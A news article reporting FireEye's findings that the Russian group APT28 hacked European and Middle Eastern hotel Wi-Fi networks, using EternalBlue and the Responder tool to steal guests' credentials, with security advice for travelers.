Appropriately paranoid travelers have always been wary of hotel Wi-Fi. Now they have a fresh justification of their worst wireless networking fears: A Russian espionage campaign has used those Wi-Fi networks to spy on high-value hotel guests, and recently started using a leaked NSA hacking tool to upgrade their attacks.
Since as early as last fall, the Russian hacker group known as APT28, or Fancy Bear, has targeted victims via their connections to hacked hotel Wi-Fi networks, according to a new report from security firm FireEye, which has closely tracked the group’s intrusions, including its breach of the Democratic National Committee ahead of last year’s election. Last month, FireEye says those hackers, believed to be associated with the Russian military intelligence service GRU, have begun to use EternalBlue, the leaked NSA hacking tool, as one technique to broaden their control of hotel networks after gaining an initial foothold via phishing or other techniques. Disturbingly, once those hackers take control of hotels’ Wi-Fi, they’re using that access to harvest victim computers’ usernames and passwords silently, with a trick that doesn’t even require users to actively type them when signed onto the hotel network.
“It’s definitely a new technique” for the prolific Fancy Bear hacker group, says Ben Read, who leads FireEye’s espionage research team. “It’s a much more passive way to collect on people. You can just sit there and intercept stuff from the Wi-Fi traffic.”
FireEye says it first saw evidence that Fancy Bear might be targeting hotels in the fall of last year, when the company analyzed an intrusion that had started on one corporate employee’s computer. The company traced that infection to the victim’s use of a hotel Wi-Fi network while traveling; 12 hours after the person had connected to that network, someone connected to the same Wi-Fi network had used the victim’s own credentials to log into their computer, install malware on their machine, and access their Outlook data. That implies, FireEye says, that a hacker had been sitting on the same hotel’s network, possibly sniffing its data to intercept the victim’s credentials.
Then, just last month, FireEye learned of a series of similar Wi-Fi attacks at hotels across seven European capitals and one Middle Eastern capital. In each case, hackers had first breached the target hotel’s network—FireEye believes via the common tactic of phishing emails carrying infected attachments that included malicious Microsoft Word macros. They then used that access to launch the NSA hacking tool EternalBlue, leaked earlier this year in a collection of NSA internal data by hackers known as the ShadowBrokers, which allowed them to quickly spread their control through the hotels’ networks via a vulnerability in Microsoft’s so-called “server message block” protocol, until they reached the servers managing the corporate and guest Wi-Fi networks.
From there, the attackers used a network-hacking tool called Responder, which allowed them not only to monitor traffic on the hijacked networks, but also to trick computers connecting to them to cough up users’ credentials without giving victims any sign of the theft. When the victim computer reaches out to known services like printers or shared folders, Responder can impersonate those friendly entities with a fake authentication process, fooling the victim machine into transmitting its network username and password. And while the password is sent in a cryptographically hashed form, that hashing can sometimes be cracked. (FireEye believes, for instance, that hackers used Responder to steal the hotel guest’s password in the 2016 case; the 12-hour delay may have been the time it took to crack the hash.)
In each case, FireEye says that the hacked networks were those of moderately high-end hotels, the kind that attract presumably valuable targets. “These were not super expensive places, but also not the Holiday Inn,” FireEye’s Read says. “They’re the type of hotel a distinguished visitor would stay in when they’re on corporate travel or diplomatic business.”
But FireEye says it doesn’t know whether the hackers had specific visitors in mind, or were simply casting a wide net for potential victims. “Maybe this was designed just to establish a foothold and see who shows up, or maybe they were just testing something out,” says Read. Other than victim whose case they analyzed last year, the company’s analysts couldn’t confirm any individual victims whose credentials were stolen from the target hotels.
FireEye says it has “moderate confidence” in its conclusion that Fancy Bear conducted both the 2016 hotel attack and the more recent spate. It bases that assessment on the use of two pieces of Fancy Bear-associated malware, known as GameFish and XTunnel, planted on hotel and victim computers. The company also points to clues in the command and control infrastructure of that malware and information about the victims, which it’s not making public.
If Fancy Bear is in fact behind the hotel espionage spree, FireEye notes that the group’s use of EternalBlue would represent the first publicly confirmed time that Russian hackers have used one of the NSA hacking techniques leaked in the ShadowBrokers’ scandal. But the Ukrainian government has already blamed Russia for the creation of the NotPetya malware, which used EternalBlue to spread within victims’ networks as it crippled thousands of companies earlier this summer. (The security firms ESET has also linked NotPetya with a hacking group called TeleBots or Sandworm, which FireEye has tied to Russia.) EternalBlue has also helped enable other hacking epidemics from the WannaCry ransomware to cryptocurrency-mining malware. That proliferation of a powerful and silent NSA hacking tool has caused controversy for the agency and scrutiny of its suspected stockpile of secret computer intrusion techniques, despite the fact that the NSA helped Microsoft to distribute a patch for the flaw EternalBlue exploited months before it was used in the WannaCry campaign.
The Fancy Bear hotel-hacking campaign would also represent a new evolution of the group’s intrusion techniques, which have been used in everything from stealthy spying campaigns to noisy, disruptive operations, like the data-destroying attack on the French television station TV5Monde, or the leaks from the DNC and Clinton campaigns last year.
But more broadly, sophisticated hackers infiltrating hotels to spy on their guests has happened before. A similar campaign known as DarkHotel, believed to be the work of North Korea cyberspies, came to light in 2014. The Duqu 2.0 malware, widely believed to be the work of Israeli hackers, was found in the networks of European hotels hosting Iranian nuclear negotiations the following year.
All of which should serve as a reminder that hotel networks are not safe havens for travelers with sensitive information. FireEye’s Read warns that even using a VPN may not prevent the leakage of private credentials that Responder exploits, though he notes that vulnerability likely depends on which proxy software someone is using. But the safest approach, for any traveler with truly valuable secrets to keep, is to bring your own wireless hotspot—and then stay off the hotel’s Wi-Fi altogether.